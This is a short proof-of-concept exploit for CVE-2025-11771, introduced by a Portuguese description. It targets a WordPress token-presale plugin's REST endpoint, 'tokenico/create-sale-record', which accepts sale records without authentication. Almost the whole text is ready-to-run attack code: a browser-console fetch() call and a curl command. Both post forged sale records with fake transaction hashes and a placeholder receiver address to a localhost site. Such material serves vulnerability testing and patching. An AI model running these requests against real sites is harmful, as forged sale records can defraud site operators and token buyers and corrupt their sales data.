
Prova de conceito de exploit para CVE-2025-11771 demonstrando a criação não autenticada de registros de venda por meio de um endpoint da API REST do WordPress, com exemplos de console do navegador e curl para testes de segurança.
fetch('http://localhost/wordpress/wp-json/tokenico/create-sale-record', {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: new URLSearchParams({
networkId: "137",
presaleKey: "TESTKEY1234",
createdAt: String(Date.now()),
tokenAmount: "1000",
nativeCurrency: "MATIC",
purchaseAmount: "777",
transactionHash: "evil-" + Date.now(),
transactionUrl: "https://example.org/tx/" + Date.now(),
receiverAddress: "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef",
receiverAddressUrl: "https://example.org/address/0xdead"
})
}).then(r => r.text()).then(console.log);
curlcurl -s -X POST 'http://localhost/wordpress/wp-json/tokenico/create-sale-record' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'networkId=137&presaleKey=TESTKEY1234&createdAt=1724246400000&tokenAmount=1000&nativeCurrency=MATIC&purchaseAmount=777&transactionHash=evil-1724246400000&transactionUrl=https://example.org/tx/evil-1724246400000&receiverAddress=0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef&receiverAddressUrl=https://example.org/address/0xdead'